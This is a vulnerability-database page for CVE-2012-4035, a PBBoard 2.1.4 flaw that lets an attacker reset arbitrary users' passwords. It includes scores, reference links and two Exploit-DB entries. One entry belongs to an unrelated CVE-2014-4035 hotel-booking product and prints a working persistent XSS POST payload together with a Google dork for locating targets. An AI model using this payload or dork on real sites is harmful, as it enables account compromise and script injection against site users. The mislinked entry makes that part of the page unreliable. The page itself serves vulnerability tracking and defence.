CVE-2012-4035
published 2012-08-12CVE-2012-4035: The new_password page in PBBoard 2.1.4 allows remote attackers to change the password of arbitrary user accounts via the member_id and new_password parameters…
PriorityP355high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.08%
86.0th percentile
The new_password page in PBBoard 2.1.4 allows remote attackers to change the password of arbitrary user accounts via the member_id and new_password parameters to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pbboard | pbboard | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting
exploitdb·2019-08-12·CVSS 4.3
CVE-2014-4035 [MEDIUM] BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting
BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting
---
# Exploit Title:BSI Advance Hotel Booking System Persistent XSS
# Google Dork: intext:Hotel Booking System v2.0 © 2008 - 2012 Copyright Best Soft Inc
# Date: Wed Jun 4 2014
# Exploit Author: Angelo Ruwantha
# Vendor Homepage: http://www.bestsoftinc.com
# Software Link: http://www.bestsoftinc.com/php-advance-hotel-booking-system.html
# Version: V2.0
# Tested on: archlinux
# CVE : CVE-2014-4035
Vulnerability
[+]Method:POST
1.http://URL/hotel-booking/booking_details.php (;persistent XSS)
allowlang=&title=<IMG SRC="javascript:alert('HelloWorld ;)');"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=
every parameter injectable :)
Exploit-DB
PBBoard - 'member_id' Validation Password Manipulation
exploitdb·2012-08-08
CVE-2012-4035 PBBoard - 'member_id' Validation Password Manipulation
PBBoard - 'member_id' Validation Password Manipulation
---
source: https://www.securityfocus.com/bid/54916/info
PBBoard is prone to multiple security vulnerabilities including:
1. Multiple SQL-injection vulnerabilities
2. A security-bypass vulnerability
3. An arbitrary file upload vulnerability
Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application.
PBBoard 2.1.4 is vulnerable; other versions may also be affected.
No writeups or analysis indexed.
http://osvdb.org/84481http://secunia.com/advisories/50153http://www.pbboard.com/forums/t10352.htmlhttp://www.pbboard.com/forums/t10353.htmlhttp://www.securityfocus.com/bid/54916https://exchange.xforce.ibmcloud.com/vulnerabilities/77506https://www.htbridge.com/advisory/HTB23101http://osvdb.org/84481http://secunia.com/advisories/50153http://www.pbboard.com/forums/t10352.htmlhttp://www.pbboard.com/forums/t10353.htmlhttp://www.securityfocus.com/bid/54916https://exchange.xforce.ibmcloud.com/vulnerabilities/77506https://www.htbridge.com/advisory/HTB23101
2012-08-12
Published